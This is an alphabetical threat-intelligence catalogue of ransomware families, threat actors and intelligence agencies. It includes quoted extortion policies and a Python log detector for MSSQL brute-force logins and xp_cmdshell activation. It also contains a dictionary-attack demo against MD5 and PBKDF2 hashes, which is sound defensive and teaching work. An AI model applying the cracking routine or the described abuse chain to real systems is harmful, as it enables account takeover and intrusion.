Flax Typhoon is a Chinese state-sponsored threat actor that primarily targets organizations in Taiwan. They conduct espionage campaigns and focus on gaining and maintaining long-term access to networks using minimal malware. Flax Typhoon relies on tools built into the operating system and legitimate software to remain undetected. They exploit vulnerabilities in public-facing servers, use living-off-the-land techniques, and deploy a VPN connection to maintain persistence and move laterally within compromised networks.

Fletchen

Fletchen is an active extortion or ransomware group tracked by RansomLook.

FLKR Ransomware

The ransom note is written in English, so the ransomware can target users worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all of the user's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

FlowEncrypt

ransomware

FlowerStorm

FlowerStorm is a phishing-as-a-service platform that mimics legitimate sign-in services in order to bypass multi-factor authentication. The majority of its targets are located in North America and Europe, with a significant focus on organizations in the United States. FlowerStorm's operational mistakes have exposed weaknesses in its infrastructure that defenders can use for disruption and analysis.

Fluffy-TAR

ransomware

Flying Kitten

Activity: defense and aerospace sectors, also interested in targeting entities in the oil/gas industry.

FlyingYeti

FlyingYeti is a Russia-aligned threat actor targeting Ukrainian military entities. They conduct reconnaissance activities and launch phishing campaigns using malware like COOKBOX. FlyingYeti exploits the WinRAR vulnerability CVE-2023-38831 to infect targets with malicious payloads. Cloudforce One has successfully disrupted their operations and provided recommendations for defense against their phishing campaigns.

Flyper

Ransomware Based on EDA2 / HiddenTear

Fog

Fog is a sophisticated ransomware strain first observed in April–May 2024, initially targeting U.S. educational institutions before expanding into sectors such as government, business services, finance, and manufacturing. The group conducts fast, double-extortion attacks: they exploit compromised VPN credentials or known vulnerabilities, deploy encryption (notably using extensions like .fog, .FLOCKED), and exfiltrate data prior to encryption to maximize victim pressure. Fog is associated with other prolific actors—such as Akira and Conti—through shared tooling, infrastructure timelines, and even cryptocurrency wallets.

Fonco

Ransomware. The contact email safefiles32@mail.ru also appears as a prefix in the contents of encrypted files.

FonixCrypter

ransomware

Foreign Intelligence Service (Azerbaijan)

Foreign Intelligence Service (Xarici Kəşfiyyat Xidməti)

Foreign Intelligence Service of Ukraine

Foreign Intelligence Service of Ukraine – Sluzhba Zovnishnioyi Rozvidky Ukrayiny (SZR or SZRU)

Foreign Intelligence Service (Romania)

Foreign Intelligence Service (SIE) – Serviciul de Informații Externe

Foreign Intelligence Service (Russia)

Foreign Intelligence Service (Russia) (SVR) – Служба Внешней Разведки

Forsvarets sikkerhetstjeneste

Forsvarets sikkerhetstjeneste (FOST) – Norwegian Defence Security Service (NORDSS)

FortuneCookie

Ransomware

FOXY PANDA

Adversary group targeting telecommunication and technology organizations.

Foxy

ransomware

Frag

Frag is a relatively new ransomware and data extortion group first seen in February 2025. The group operates a dedicated Tor-based leak site where it publishes victim details, including sector, location, and sample stolen files, as part of its double-extortion strategy. Within its first month of activity, Frag claimed over two dozen victims, spanning industries such as manufacturing, aviation, real estate, retail, and legal services, with a global footprint including the United States, the Netherlands, and Singapore. Intrusion methods have included exploitation of known vulnerabilities—such as the Veeam Backup & Replication flaw CVE-2024-40711—and compromised remote access appliances. The group’s operations and targeting style suggest experienced actors, possibly with past involvement in other ransomware projects.

Free-Freedom

Ransomware. Unlock code is adam or adamdude9.

Freecivilian

Freecivilian is an active extortion or ransomware group tracked by RansomLook.

Freeme

This crypto-ransomware encrypts user data with AES and then demands a ransom in BTC (the amount is not stated in the note) to return the files. Original title: not indicated in the note. The executable is named FreeMe.exe.

freeworld

FreeWorld is a ransomware variant first observed in September 2023, and is believed to be derived from the Mimic ransomware family. It is deployed through coordinated campaigns dubbed DB#JAMMER, which exploit poorly secured Microsoft SQL (MSSQL) servers exposed to the internet. Attackers gain initial access via brute force, leverage the xp_cmdshell feature to execute shell commands, disable defenses, deploy remote access tools like Cobalt Strike and AnyDesk, and eventually deliver the FreeWorld payload. The ransomware encrypts files using hybrid encryption and appends the .FreeWorldEncryption extension. Victims receive a ransom note titled FreeWorld-Contact.txt, directing them on payment and data recovery steps.
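The DB#JAMMER chain above leaves a recognizable trail in the SQL Server ERRORLOG: a burst of failed logins from one client, a success for the same account, and then the 'xp_cmdshell' configuration option flipping from 0 to 1. The detection below is an added example (not code from the page or from the DB#JAMMER reporting) that runs over a constructed ERRORLOG excerpt; the line formats follow what SQL Server writes for login events and sp_configure changes, but the timestamps, account names and client addresses are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (not from a real incident): five failed 'sa'
# logins from one client, then a success, then xp_cmdshell being enabled.
SAMPLE_LOG = """\
2023-09-01 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2023-09-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 10:00:01.45 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 10:00:02.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 10:00:02.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 10:00:03.15 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 10:00:09.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2023-09-01 10:00:15.30 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-09-01 10:00:15.41 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-09-01 11:30:00.00 Logon       Login failed for user 'backup'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<src>\S+)\s+(?P<msg>.*)$")
FAIL_RE = re.compile(r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
SUCCESS_RE = re.compile(r"Login succeeded for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
CMDSHELL_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def parse(log: str) -> list:
    # Yields (timestamp, source column, message) for each well-formed line.
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts, m["src"], m["msg"]))
    return events


def detect(log: str, threshold: int = 5, window: timedelta = timedelta(minutes=10)) -> list:
    # Rule 1: >= threshold failures for (client, user) followed by a success
    #         within the window -> probable brute force that worked.
    # Rule 2: xp_cmdshell enabled; escalated when rule 1 fired recently.
    failures = defaultdict(list)  # (ip, user) -> timestamps of failed logins
    alerts = []
    for ts, src, msg in parse(log):
        f = FAIL_RE.search(msg)
        if f:
            failures[(f["ip"], f["user"])].append(ts)
            continue
        s = SUCCESS_RE.search(msg)
        if s:
            recent = [t for t in failures[(s["ip"], s["user"])] if ts - t <= window]
            if len(recent) >= threshold:
                alerts.append({"rule": "bruteforce-then-success", "ip": s["ip"],
                               "user": s["user"], "failures": len(recent), "at": ts})
            continue
        if CMDSHELL_RE.search(msg):
            escalated = any(a["rule"] == "bruteforce-then-success" and ts - a["at"] <= window
                            for a in alerts)
            alerts.append({"rule": "xp_cmdshell-enabled", "at": ts,
                           "escalated": escalated, "spid": src})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Failed-login entries are only written when login auditing is enabled on the instance, so the first rule depends on that setting. The second rule is worth keeping even without the brute-force context: xp_cmdshell should stay disabled (EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;) and any change to it on a production server is an event in its own right.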

Freshdesk

ransomware

Frog

ransomware

FrostyNeighbor

FrostyNeighbor is a Belarus-aligned APT group known for conducting influence and disinformation campaigns, particularly targeting Ukraine, Poland, and Lithuania. They have compromised various governmental and private sector entities, including the Polish Anti-Doping Agency, through hack-and-leak operations. The group is believed to collaborate with initial access brokers to exploit high-value targets, utilizing techniques such as zero-day vulnerabilities. Their operations are linked to cyber-enabled disinformation campaigns critical of the North Atlantic Alliance.

Frozen

Frozen is an active extortion or ransomware group tracked by RansomLook.

FrozrLock

ransomware

FRS

ransomware

Fs0ciety Locker Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The attackers spread the ransomware via email spam, fake updates and malicious attachments. All of the user's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

FScrypt

ransomware

FSociety

Ransomware Based on EDA2 and RemindMe

Fsteam

Fsteam is an active extortion or ransomware group tracked by RansomLook.

FTCode

A targeted email campaign has been spotted distributing the JasperLoader to victims. While the JasperLoader was originally used to then install Gootkit, Certego has observed it now being used to infect victims with a new ransomware dubbed FTCODE. Using an invoice-themed email appearing to target Italian users, the attackers attempt to convince users to allow macros in a Word document. The macro is used to run PowerShell to retrieve additional PowerShell code.

FuckSociety Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The attackers spread the ransomware via email spam, fake updates and malicious attachments. All of the user's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Lineage: Hidden Tear > APT Ransomware + RemindMe (https://id-ransomware.blogspot.ru/2016/05/remindme-ransomware-2.html) > FuckSociety.

FuckTheSystem

ransomware

Fulcrumsec

Fulcrumsec is an active extortion or ransomware group tracked by RansomLook.

FunFact Ransomware

FunFact uses the open-source GNU Privacy Guard (GnuPG) to encrypt files, then asks the victim to email the attackers to learn the amount of bitcoin to send in exchange for a decryption code. The note is written in English, so it can hit victims all over the world. The ransom is 1.22038 BTC, which was about 1,100 USD at the time.

FunkSec

Funksec is a newly identified extortion group that has claimed 11 victims across various sectors, including media, IT, and education, operating a Tor-based DLS to centralize its ransomware activities. The group advertises a free DDoS tool and may develop its own ransomware binary, indicating significant technical capability. The DLS was likely created in late November to early December 2024, with the first advertisement titled “Funksec Ransomware” posted on 3 December 2024. Currently, there is limited publicly available information on Funksec's TTPs, and it is not known to be associated with any other threat groups.

Fury

Ransomware

Fusion

Fusion is an active extortion or ransomware group tracked by RansomLook.

FusionCore

The CYFIRMA research team has identified a new up-and-coming European threat actor group known as FusionCore. Running a malware-as-a-service operation alongside a hacker-for-hire operation, they offer a wide variety of tools and services on their website, making it a one-stop shop for threat actors looking to purchase cost-effective yet customizable malware. The operators have started a ransomware affiliate program that equips attackers with the ransomware and the affiliate software to manage victims. FusionCore typically provides buyers with a detailed set of instructions for any service or product being sold, enabling individuals with minimal experience to carry out complex attacks.

Fusob

Fusob is one of the major mobile ransomware families. Between April 2015 and March 2016, about 56 percent of recorded mobile ransomware was Fusob. Like typical mobile ransomware, it employs scare tactics to extort people into paying a ransom. The program pretends to be an accusatory authority, demanding that the victim pay a fine of $100 to $200 USD or otherwise face a fictitious charge. Rather surprisingly, Fusob suggests using iTunes gift cards for payment. A timer ticking down on the screen adds to the user's anxiety. In order to infect devices, Fusob masquerades as a pornographic video player, so victims, thinking it is harmless, unwittingly download it. When Fusob is installed, it first checks the language used on the device. If it is Russian or certain Eastern European languages, Fusob does nothing. Otherwise, it proceeds to lock the device and demand a ransom. Among victims, about 40% are in Germany, with the United Kingdom and the United States following at 14.5% and 11.4% respectively. Fusob has much in common with Small, another major family of mobile ransomware; together they represented over 93% of mobile ransomware between 2015 and 2016.

FuxSocy Encryptor

ransomware

Fxmsp

Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed active directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.

Galacti-Crypter

ransomware

GamaCopy

GamaCopy is a threat actor first discovered in June 2023, known for launching cyberattacks against Russia's defense and critical infrastructure sectors while mimicking the TTPs of Gamaredon. The group has been active since at least August 2021 and primarily uses Russian-language bait documents related to military facilities. Analysis of attack samples shows considerable overlap in code structure and tactics, including the use of 7z self-extracting (SFX) archives to install UltraVNC, which then connects back over port 443. GamaCopy employs open-source tools to obfuscate its activities while targeting sensitive information in the context of the Russia-Ukraine conflict.

GambleForce

GambleForce is a threat actor specializing in SQL injection attacks. They have targeted over 20 websites in various sectors across multiple countries, compromising six companies. GambleForce utilizes publicly available pentesting tools and has been active since mid-September 2023.

GameOver

ransomware

GammA

ransomware

GandCrab

GandCrab is a ransomware family released in late January 2018 that was initially distributed via exploit kits. GandCrab had some features not seen before in ransomware, such as being the first to accept the DASH cryptocurrency and the first to use the Namecoin-powered .bit TLD for its command-and-control domains.

Gangbang

Gangbang is an active extortion or ransomware group tracked by RansomLook.

Gangmasters and Labour Abuse Authority

Gangmasters and Labour Abuse Authority - Human trafficking, slavery, economic, and serious organised crime.

Garda National Surveillance Unit

National Surveillance Unit (NSU)

garrantydecrypt

Michael Gillespie found a new ransomware that appends the .garrantydecrypt extension and drops a ransom note named #RECOVERY_FILES#.txt

GarryWeber Ransomware

The ransom note is written in English, so the ransomware can target users worldwide. Its original name is FileSpy (FileSpy Application). It is spread via email spam, fake updates, infected attachments and similar lures. It encrypts all of the user's files, including music, MS Office documents and more.

Gazprom

Gazprom is an active extortion or ransomware group tracked by RansomLook.

GC01

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

GC02

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

GC47 Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The attackers spread the ransomware via email spam, fake updates and malicious attachments. All of the user's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

gd lockersec

Our team members are from different countries and we are not interested in anything else, we are only interested in dollars.

We do not allow CIS, Cuba, North Korea and China to be targeted.

Re-attacks are not allowed for target companies that have already made payments.

We do not allow non-profit hospitals and some non-profit organizations to be targeted.

Gelsemium

The Gelsemium group has been active since at least 2014 and has been described in the past by a few security companies. Gelsemium's name comes from one possible translation ESET found while reading a report from VenusTech, who first dubbed the group 狼毒草. Gelsemium is the name of a genus of flowering plants belonging to the family Gelsemiaceae; Gelsemium elegans is the species that contains toxic compounds such as Gelsemine, Gelsenicine and Gelsevirine, which ESET chose as names for the three components of this malware family.

Geminis3

ransomware

Gendarmerie Intelligence Directorate

Gendarmerie Intelligence Directorate (law enforcement)

Gendarmerie

ransomware

General Commissariat of Information

General Commissariat of Information - (Comisaría General de la Información) (CGI)

General Commissariat of Judiciary Police

General Commissariat of Judiciary Police - (Comisaría General de Policía Judicial) (CGPJ)

General Department of Military Intelligence

General Department of Defence Intelligence (GDDI)/General Department II - Tổng cục Tình báo Quốc phòng (TBQP)/Tổng cục II (TC2)

General Directorate for Internal Security

General Directorate for Internal Security (DGSI; Direction générale de la sécurité intérieure) – Domestic counter-terrorism and counter-espionage intelligence.

General Directorate for Territorial Surveillance (Morocco)

General Directorate for Territorial Surveillance - Direction de la Surveillance du Territoire (DST)

General Directorate of Analysis and Strategic Intelligence (Panama)

General Directorate of Analysis and Strategic Intelligence - Direccion General de Analisis e Inteligencia Estrategica (DGAIE)

General Directorate of General Security

General Directorate of General Security

General Directorate of Intelligence

General Directorate of Intelligence (GDI) – د استخباراتو لوی ریاست

General Intelligence Agency of Mongolia

General Intelligence Agency of Mongolia (GIA)

General Intelligence and Security Service

General Intelligence and Security Service - Algemene Inlichtingen en Veiligheidsdienst (AIVD)

General Intelligence Directorate (Syria)

General Intelligence Directorate

General Intelligence Service (Sudan)

General Intelligence Service

General Security Directorate (Iraq)

General Security Directorate - (GSD) - (Internal security agency)

General Staff Intelligence Directorate

General Staff Intelligence Directorate (military intelligence)

General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)

General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)

genesis

Financial interests only.
We do not provide or work with affiliate programs, no collaborations either.
The requested payment must be made within a specified time frame, otherwise the price may be increased, we will begin to publish the data we have about your company and notify the company's customers and suppliers.
Charitable, non-profit, and medical institutions are only hacked if they have reputation gaps known from open sources or discovered in company data. However, this is only data extraction; live support systems are not affected.
Data is always destroyed after payment; we do not attack the same company twice.
Interesting fact: once, the total amount of claims against a breached company exceeded its entire capitalization. We know how to create trouble, though it is in our mutual interest to avoid it.
To make the data leak more valuable, the most important information is published in a separate folder for each company called “parsed” and is also published on darkweb forums.

Geneve

ransomware

Genobot

ransomware

Georgian Intelligence Service

Georgian Intelligence Service (GIS) − საქართველოს დაზვერვის სამსახური

GermanWiper

ransomware

GetCrypt

GetCrypt is a ransomware that is distributed via the RIG exploit kit: victims are redirected to RIG, which drops the ransomware, and it then encrypts all the files on the device.

GG Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The attackers spread the ransomware via email spam, fake updates and malicious attachments. All of the user's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Poses as Hewlett-Packard (2016).

Ghost Jackal

AnonGhost is an apparent hacktivist collective. In October 2023, following a series of air- and land-based attacks in the Gaza Strip, AnonGhost was one of several hacktivist groups that claimed responsibility for disruptive attacks against computer networks in Israel. Researchers indicated that they observed AnonGhost actors exploit an undisclosed API vulnerability in Red Alert, an application that provides warning of projectile attacks in Israel, using Python scripts to intercept web requests and send spam messages to the app's users.[[Group-IB Threat Intelligence Tweet October 9 2023](/references/2df546ed-6577-44b2-9b26-0a17c3622df7)]

Ghost Ransomware Actors

Ghost actors, located in China, conduct widespread ransomware attacks for financial gain. They target networks with vulnerabilities, affecting organizations across more than 70 countries, including critical infrastructure, schools, healthcare, and more.[[U.S. CISA Ghost Cring Ransomware February 19 2025](/references/d3b3cebd-3428-4d71-a81e-a7cb6248e3b7)]

ghost

aka Cring / Ghost (Cring)

Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a

GhostCrypt

Ransomware Based on Hidden Tear

GhostEmperor

GhostEmperor is a Chinese-speaking threat actor that targets government entities and telecom companies in Southeast Asia. They employ a Windows kernel-mode rootkit called Demodex to gain remote control over their targeted servers. The actor demonstrates a high level of sophistication and uses various anti-forensic and anti-analysis techniques to evade detection. They have been active for a significant period of time and continue to pose a threat to their targets.

GhosTEncryptor

ransomware

GhostHammer

ransomware

GhostNet

Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting and laboratory analysis, discovered a great deal more. It ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media and NGOs. The Tibetan computer systems we manually investigated, and from which our investigation began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information. Attacks on the Dalai Lama's Private Office: the OHHDL started to suspect it was under surveillance while setting up meetings between His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat's office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia, who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)

GhostR

Ghostr is a financially motivated threat actor known for stealing a confidential database containing 5.3 million records from the World-Check and leaking about 186GB of data from a stock trading platform. They have been active on Breachforums.is, revealing massive data breaches involving comprehensive details of Thai users, including full names, phone numbers, email addresses, and ID card numbers.

GhostRedirector

GhostRedirector is a China-aligned threat actor that has compromised at least 65 Windows servers across various sectors, primarily in Brazil, Thailand, and Vietnam. It employs a passive C++ backdoor named Rungan and a malicious IIS module called Gamshen to maintain persistent access and manipulate search engine results for SEO fraud. The actor utilizes public exploits like EfsPotato and BadPotato for privilege escalation and abuses code-signing certificates to evade detection. GhostRedirector's operations involve installing remote access tools, creating rogue administrator accounts, and leveraging SQL injection vulnerabilities to execute PowerShell for downloading malicious payloads.

GhostSec

GhostSec is a hacktivist group that emerged as an offshoot of Anonymous. They primarily focused on counterterrorism efforts and monitoring online activities associated with terrorism. They gained prominence following the 2015 Charlie Hebdo shooting in Paris and the rise of ISIS.

Ghostwriter

Ghostwriter is referred as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.

GIBBERISH PANDA

GIBBERISH PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Gibberish

ransomware

Gibon

ransomware

Gingerbread

Ransomware

Gitloker

Gitloker is a threat actor group targeting GitHub repositories, wiping their contents, and extorting victims for their data. They use stolen credentials to compromise accounts, claim to have created a backup, and instruct victims to contact them on Telegram. The attackers leave a ransom note in the form of a README file, urging victims to negotiate the return of their data. GitHub is working to combat these evolving attacks and the vulnerabilities they exploit.

Giyotin

ransomware

Gladius

ransomware

Global Affairs Canada

Global Affairs Canada (GAC) Bureau of Intelligence Analysis and Security and Bureau of Economic Intelligence

global

Not a RaaS yet.

Globe v1

Ransomware

globe

Globe is a ransomware family that first appeared in August 2016, notable for its highly customizable codebase that allows operators to configure ransom note text, encryption algorithms, and file extensions. Globe uses symmetric encryption (RC4 or AES) to lock files and typically appends custom extensions such as .GLOBE, .PURPLE, .HNY, or others set by the attacker. The malware is distributed through malicious spam emails with infected attachments, compromised websites, and exploit kits. Globe’s flexibility made it attractive to low-skilled actors, resulting in many different variants in the wild. The family has primarily targeted small to medium-sized businesses and individual users across multiple regions, with no clear geographic focus.

Globe2 Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The attackers spread the ransomware via email spam, fake updates and malicious attachments. All of the user's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Globe3 Ransomware

The ransom note is written in English, so the ransomware can target users worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all of the user's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. The ransom is 3 bitcoins. The extension depends on the config file, which suggests Globe is sold as a ransomware kit.

GlobeImposter

During December 2017, a new variant of the GlobeImposter Ransomware was detected for the first time and reported on malware-traffic-analysis. At first sight this ransomware looks very similar to other ransomware samples and uses common techniques such as process hollowing. However, deeper inspection showed that like LockPoS, which was analyzed by CyberBit, GlobeImposter too bypasses user-mode hooks by directly invoking system calls. Given this evasion technique is being leveraged by new malware samples may indicate that this is a beginning of a trend aiming to bypass user-mode security products.

GNL Locker

Ransomware. Only encrypts systems located in Germany (DE) or the Netherlands (NL). Variants, from oldest to latest: Zyklon Locker, WildFire Locker, Hades Locker.

Gnosticplayers

The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong, slow hashing algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can be cracked with various levels of difficulty, but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker said he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker said this is no longer his target, as he learned that other hackers had already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave in to extortion demands and paid fees so the breaches would remain private. "I came to an agreement with some companies, but the concerned startups won't see their data for sale," he said. "I did it that's why I can't publish the rest of my databases or even name them."
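The point behind the bcrypt complaint above is cost per guess, and it is easy to make concrete. The example below is added here and is not from the page or the ZDNet article; it builds a constructed user table (four users, two of whom share a password), stores it once as unsalted MD5 and once with per-user salts and a slow key-derivation function, and runs the same dictionary attack against both. PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt, which is not in the standard library; the cost argument is the same.

```python
import hashlib
import os

# Constructed sample data: a small wordlist and a user table in which alice
# and carol chose the same weak password and dave chose a strong one.
WORDLIST = ["password", "123456", "letmein", "qwerty", "hunter2", "welcome1"]
USER_PASSWORDS = {"alice": "hunter2", "bob": "letmein",
                  "carol": "hunter2", "dave": "c0rrect-h0rse-9"}


def store_md5(users: dict) -> dict:
    # The weak scheme: fast, unsalted. Equal passwords give equal hashes.
    return {u: hashlib.md5(p.encode()).hexdigest() for u, p in users.items()}


def store_pbkdf2(users: dict, iterations: int = 200_000) -> dict:
    # The stronger scheme: a random 16-byte salt per user and a deliberately
    # slow derivation. Equal passwords give different digests.
    out = {}
    for u, p in users.items():
        salt = os.urandom(16)
        out[u] = (salt, hashlib.pbkdf2_hmac("sha256", p.encode(), salt, iterations))
    return out


def crack_md5(stored: dict, wordlist: list) -> tuple:
    # One hash per dictionary word builds a lookup table that cracks every
    # user at once, regardless of how many users share the password.
    table, hashes = {}, 0
    for w in wordlist:
        table[hashlib.md5(w.encode()).hexdigest()] = w
        hashes += 1
    cracked = {u: table[h] for u, h in stored.items() if h in table}
    return cracked, hashes


def crack_pbkdf2(stored: dict, wordlist: list, iterations: int = 200_000) -> tuple:
    # The salt forces a fresh derivation per (user, word) pair, and each
    # derivation is thousands of times slower than an MD5 call.
    cracked, hashes = {}, 0
    for u, (salt, digest) in stored.items():
        for w in wordlist:
            hashes += 1
            if hashlib.pbkdf2_hmac("sha256", w.encode(), salt, iterations) == digest:
                cracked[u] = w
                break
    return cracked, hashes


if __name__ == "__main__":
    weak = store_md5(USER_PASSWORDS)
    strong = store_pbkdf2(USER_PASSWORDS)
    print("md5   :", crack_md5(weak, WORDLIST))
    print("pbkdf2:", crack_pbkdf2(strong, WORDLIST))
```

Both schemes give up the three weak passwords: salting and stretching do not rescue "hunter2". What changes is the work factor, here 6 cheap MD5 calls against 19 slow derivations for four users, and that gap grows linearly with the number of users and the size of the wordlist. That is the difference between a leaked table that is cracked in minutes and one that buys users time to rotate their passwords.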

GOBLIN PANDA

Goblin Panda is one of a handful of elite Chinese advanced persistent threat (APT) groups. Most Chinese APTs target the United States and NATO, but Goblin Panda focuses primarily on Southeast Asia.

GoCryptoLocker

ransomware

God Crypt Joke Ransomware

MalwareHunterTeam found a new ransomware called God Crypt that does not appear to decrypt and appears to be a joke ransomware. It has an unlock code of 29b579fb811f05c3c334a2bd2646a27a.

Godra

ransomware

GOFFEE

GOFFEE is a threat actor that has targeted entities in the Russian Federation since early 2022, employing spear phishing emails with malicious attachments, including modified Owowa and patched explorer.exe. They have utilized PowerTaskel, a non-public Mythic agent in PowerShell, and introduced a new implant called "PowerModul" for attacks against sectors such as media, telecommunications, and government. GOFFEE has increasingly shifted to a binary Mythic agent for lateral movement and has incorporated Word documents with malicious VBA scripts in their infection chains. The group has demonstrated a consistent evolution in their TTPs while maintaining identifiable characteristics that attribute their campaigns with high confidence.

GOG Ransomware

It's directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

GoGoogle

ransomware

GoHack

ransomware

GOLD BURLAP

GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).

GOLD CABIN

GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial-appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.

GOLD DUPONT

GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN's TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE's IcedID (Bokbot) malware as an IAV in some intrusions.

GOLD EVERGREEN

